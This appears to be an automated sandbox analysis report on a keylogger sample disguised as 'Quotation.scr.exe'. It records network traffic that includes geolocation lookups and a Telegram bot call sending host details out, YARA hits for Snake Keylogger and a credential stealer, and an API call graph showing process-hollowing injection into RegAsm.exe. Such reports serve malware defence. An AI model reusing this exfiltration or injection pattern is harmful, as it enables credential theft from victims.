                                        2024-09-09 06:55:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:21 UTC716INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:21 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19703
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HTHqR4boZo3KZL%2BNWy93Yd27%2BFTjUZndaKBWOvsvH%2BELYWf0N4Wfcs%2F12aDNXCEiEn1%2BaZh5%2BMeJcuHnsYHVZcMW%2BG9H1P4JFcCufNScwCYbinLOABnRlppaPo4lw%2FtmEX2pW9sq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545b05fab8c59-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.649726188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:24 UTC716INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:24 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19706
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqXDMgS2p%2BsoFXy3xdhk%2Bi2XinhQwY0fD8Nd9UKTxWC%2Faj%2FIxu0QBoy%2Fea3R%2BzSg7w4Gh16Jrc12AJd3yJLEc1yDoNEg7k1tAUc%2B9HbZdxX01Hmw%2Bm8WZWVZ20EPdJFoMEQ8MQdm"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545bf4edc434c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.649728188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:26 UTC720INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:26 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19708
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4K%2FbRTKzfXpPvpDmX35H824g%2FU0XQ3aA6PN%2BTK8CX%2B7BEdojd1RX2%2FBSObVnYXb0KZrUpIWGuc7Kr4P6aLFW%2BUFkWZ8TF%2F2WCMNZjA%2B%2FwMiDemd71bA2Hy8ycP0FNS588%2F4Jn8aK"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545cd1ea56a58-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.649731188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:33 UTC706INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:33 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19715
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0IjzAFVVnkUuGOzTxAYJYtyqrg3X6HKnBUErGg9WSC4U1f5mBm%2BPeW6gf0Tu9fMY9s6MlXPbq0xcN3WD4qRvNySt0DNWTT%2FtMymz4OYYjb9%2FzUQljPZt9F0MTBuRB4RAnREm0lXk"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0545faaa94c461-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.649733188.114.96.34432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:34 UTC710INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:34 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 19716
                                        Last-Modified: Mon, 09 Sep 2024 01:26:58 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxGobuRS9cPeUpSlgAfMrLXoxi%2FG63%2BnGcTOmJCTfJILkpRN%2B%2FHzHhZRvEK9AX6Vyl%2BT0Fdbl5VNcK0wPdIxZLNF9cieyES8r8URlPbT6hwKLLDVP0iVvVb7sngttQqq8UJy322K"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c0546031b1e4331-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-09 06:55:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-09-09 06:55:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.649734149.154.167.2204432432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-09 06:55:35 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: Keep-Alive
                                        2024-09-09 06:55:35 UTC344INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Date: Mon, 09 Sep 2024 06:55:35 GMT
                                        Content-Type: application/json
                                        Content-Length: 55
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2024-09-09 06:55:35 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:54:54
                                        Start date:09/09/2024
                                        Path:C:\Users\user\Desktop\Quotation.scr.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quotation.scr.exe"
                                        Imagebase:0x140000
                                        File size:6'144 bytes
                                        MD5 hash:E0A5EE16DD5018801A0AFADB2559B555
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:02:55:07
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0x8b0000
                                        File size:65'440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:9.7%
                                          Dynamic/Decrypted Code Coverage:89.9%
                                          Signature Coverage:3.8%
                                          Total number of Nodes:237
                                          Total number of Limit Nodes:8
                                          execution_graph 52187 586ccb0 52188 586ccff NtProtectVirtualMemory 52187->52188 52190 586cd77 52188->52190 51960 578e152 51961 578e15c 51960->51961 51965 58d6c01 51961->51965 51969 58d6c10 51961->51969 51962 578e19a 51966 58d6c10 51965->51966 51967 58d6c3b 51966->51967 51973 58d6d31 51966->51973 51967->51962 51970 58d6c25 51969->51970 51971 58d6c3b 51970->51971 51972 58d6d31 10 API calls 51970->51972 51971->51962 51972->51971 51974 58d6d3b 51973->51974 51978 58d8118 51974->51978 51983 58d8128 51974->51983 51979 58d8128 51978->51979 51988 58d8624 51979->51988 51993 58d8370 51979->51993 51984 58d813d 51983->51984 51986 58d8624 10 API calls 51984->51986 51987 58d8370 10 API calls 51984->51987 51985 58d6e88 51986->51985 51987->51985 51989 58d862e 51988->51989 51990 58d837b 51988->51990 51990->51988 51998 58d88c8 51990->51998 52012 58d88d8 51990->52012 51994 58d8373 51993->51994 51995 58d862e 51994->51995 51996 58d88c8 10 API calls 51994->51996 51997 58d88d8 10 API calls 51994->51997 51996->51994 51997->51994 51999 58d88d8 51998->51999 52000 58d890f 51999->52000 52026 58d979d 51999->52026 52031 58d94b2 51999->52031 52037 58d8e30 51999->52037 52042 58d9276 51999->52042 52047 58d9097 51999->52047 52051 58d9344 51999->52051 52056 58d8c44 51999->52056 52061 58d9495 51999->52061 52067 58d8b3a 51999->52067 52072 58d9609 51999->52072 52078 58d964c 51999->52078 52000->51990 52013 58d88ed 52012->52013 52014 58d890f 52013->52014 52015 58d979d 2 API calls 52013->52015 52016 58d964c 2 API calls 52013->52016 52017 58d9609 2 API calls 52013->52017 52018 58d8b3a 2 API calls 52013->52018 52019 58d9495 2 API calls 52013->52019 52020 58d8c44 2 API calls 52013->52020 52021 58d9344 2 API calls 52013->52021 52022 58d9097 2 API calls 52013->52022 52023 58d9276 2 API calls 52013->52023 52024 58d8e30 2 API calls 52013->52024 52025 58d94b2 2 API calls 52013->52025 52014->51990 52015->52014 52016->52014 52017->52014 52018->52014 52019->52014 52020->52014 52021->52014 52022->52014 52023->52014 52024->52014 52025->52014 52027 58d97b5 52026->52027 52083 586df83 52027->52083 52087 586df88 52027->52087 52028 58d899d 52028->52000 52032 58d936a 52031->52032 52034 58d899d 52031->52034 52091 58db549 52032->52091 52096 58db558 52032->52096 52033 58d93b2 52033->52000 52034->52000 52038 58d8e3a 52037->52038 52109 586e1a0 52038->52109 52113 586e198 52038->52113 52039 58d8e71 52043 58d928e 52042->52043 52117 58d9f20 52043->52117 52121 58d9f30 52043->52121 52044 58d899d 52044->52000 52138 58db5a0 52047->52138 52143 58db5b0 52047->52143 52048 58d90af 52052 58d934e 52051->52052 52054 58db549 2 API calls 52052->52054 52055 58db558 2 API calls 52052->52055 52053 58d93b2 52053->52000 52054->52053 52055->52053 52057 58d8f91 52056->52057 52058 58d899d 52056->52058 52156 58db4b1 52057->52156 52161 58db4c0 52057->52161 52058->52000 52062 58d8e56 52061->52062 52063 58d94a2 52061->52063 52065 586e1a0 NtResumeThread 52062->52065 52066 586e198 NtResumeThread 52062->52066 52064 58d8e71 52065->52064 52066->52064 52068 58d8b57 52067->52068 52070 586df83 WriteProcessMemory 52068->52070 52071 586df88 WriteProcessMemory 52068->52071 52069 58d899d 52069->52000 52070->52069 52071->52069 52073 58d936a 52072->52073 52074 58d9613 52072->52074 52076 58db549 2 API calls 52073->52076 52077 58db558 2 API calls 52073->52077 52075 58d93b2 52075->52000 52076->52075 52077->52075 52079 58d9669 52078->52079 52081 586df83 WriteProcessMemory 52079->52081 52082 586df88 WriteProcessMemory 52079->52082 52080 58d96b4 52081->52080 52082->52080 52084 586df88 WriteProcessMemory 52083->52084 52086 586e06d 52084->52086 52086->52028 52088 586dfd4 WriteProcessMemory 52087->52088 52090 586e06d 52088->52090 52090->52028 52092 58db558 52091->52092 52101 586de21 52092->52101 52105 586de28 52092->52105 52093 58db58f 52093->52033 52097 58db56d 52096->52097 52099 586de21 VirtualAllocEx 52097->52099 52100 586de28 VirtualAllocEx 52097->52100 52098 58db58f 52098->52033 52099->52098 52100->52098 52102 586de6c VirtualAllocEx 52101->52102 52104 586dee4 52102->52104 52104->52093 52106 586de6c VirtualAllocEx 52105->52106 52108 586dee4 52106->52108 52108->52093 52110 586e1e9 NtResumeThread 52109->52110 52112 586e240 52110->52112 52112->52039 52114 586e1a0 NtResumeThread 52113->52114 52116 586e240 52114->52116 52116->52039 52118 58d9f30 52117->52118 52120 58d9f69 52118->52120 52125 58da175 52118->52125 52120->52044 52122 58d9f47 52121->52122 52123 58da175 2 API calls 52122->52123 52124 58d9f69 52122->52124 52123->52124 52124->52044 52126 58da17e 52125->52126 52130 586d505 52126->52130 52134 586d510 52126->52134 52131 586d590 CreateProcessA 52130->52131 52133 586d78c 52131->52133 52136 586d590 CreateProcessA 52134->52136 52137 586d78c 52136->52137 52139 58db5c5 52138->52139 52148 586d8c0 52139->52148 52152 586d8c8 52139->52152 52140 58db5de 52140->52048 52144 58db5c5 52143->52144 52146 586d8c0 Wow64SetThreadContext 52144->52146 52147 586d8c8 Wow64SetThreadContext 52144->52147 52145 58db5de 52145->52048 52146->52145 52147->52145 52149 586d911 Wow64SetThreadContext 52148->52149 52151 586d989 52149->52151 52151->52140 52153 586d911 Wow64SetThreadContext 52152->52153 52155 586d989 52153->52155 52155->52140 52157 58db4d5 52156->52157 52159 586d8c0 Wow64SetThreadContext 52157->52159 52160 586d8c8 Wow64SetThreadContext 52157->52160 52158 58db4ee 52158->52058 52159->52158 52160->52158 52162 58db4d5 52161->52162 52164 586d8c0 Wow64SetThreadContext 52162->52164 52165 586d8c8 Wow64SetThreadContext 52162->52165 52163 58db4ee 52163->52058 52164->52163 52165->52163 52191 578e5c2 52192 578e5cc 52191->52192 52196 5865a10 52192->52196 52201 5865a01 52192->52201 52193 578e60a 52197 5865a25 52196->52197 52206 5865a50 52197->52206 52211 5865a41 52197->52211 52198 5865a3b 52198->52193 52202 5865a10 52201->52202 52204 5865a50 2 API calls 52202->52204 52205 5865a41 2 API calls 52202->52205 52203 5865a3b 52203->52193 52204->52203 52205->52203 52208 5865a7a 52206->52208 52207 5865c87 52207->52198 52208->52207 52216 58d01a8 52208->52216 52221 58d0197 52208->52221 52213 5865a50 52211->52213 52212 5865c87 52212->52198 52213->52212 52214 58d01a8 2 API calls 52213->52214 52215 58d0197 2 API calls 52213->52215 52214->52213 52215->52213 52217 58d01bd 52216->52217 52226 5869bf0 52217->52226 52230 5869bf8 52217->52230 52218 58d01d8 52218->52208 52222 58d01a8 52221->52222 52224 5869bf0 SleepEx 52222->52224 52225 5869bf8 SleepEx 52222->52225 52223 58d01d8 52223->52208 52224->52223 52225->52223 52227 5869bf8 SleepEx 52226->52227 52229 5869c9c 52227->52229 52229->52218 52231 5869c3c SleepEx 52230->52231 52233 5869c9c 52231->52233 52233->52218 52234 593e8f8 52235 593e93c VirtualAlloc 52234->52235 52237 593e9a9 52235->52237 52238 2240848 52239 2240857 52238->52239 52243 2246525 52239->52243 52251 2246548 52239->52251 52240 22408bd 52245 2246568 52243->52245 52244 2246571 52244->52240 52245->52244 52259 5937ed3 52245->52259 52262 5935408 52245->52262 52266 5937f59 52245->52266 52269 59373ea 52245->52269 52272 5934787 52245->52272 52253 2246568 52251->52253 52252 2246571 52252->52240 52253->52252 52254 5937ed3 VirtualProtect 52253->52254 52255 5934787 VirtualProtect 52253->52255 52256 59373ea VirtualProtect 52253->52256 52257 5937f59 VirtualProtect 52253->52257 52258 5935408 VirtualProtect 52253->52258 52254->52252 52255->52252 52256->52252 52257->52252 52258->52252 52260 5937ee1 52259->52260 52261 593d250 VirtualProtect 52260->52261 52261->52260 52263 5935427 52262->52263 52265 593d250 VirtualProtect 52263->52265 52264 593544e 52265->52264 52267 5937ee1 52266->52267 52267->52266 52268 593d250 VirtualProtect 52267->52268 52268->52267 52271 593d250 VirtualProtect 52269->52271 52270 59301d5 52271->52270 52274 593d250 VirtualProtect 52272->52274 52273 593479f 52274->52273 52166 21fd030 52167 21fd048 52166->52167 52168 21fd0a3 52167->52168 52170 593de18 52167->52170 52171 593de71 52170->52171 52174 593e3a8 52171->52174 52172 593dea6 52175 593e3d5 52174->52175 52178 593e56b 52175->52178 52179 593d250 52175->52179 52178->52172 52181 593d277 52179->52181 52183 593d730 52181->52183 52184 593d779 VirtualProtect 52183->52184 52186 593d334 52184->52186 52186->52172

                                          Executed Functions

                                          Function 05866CAF Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
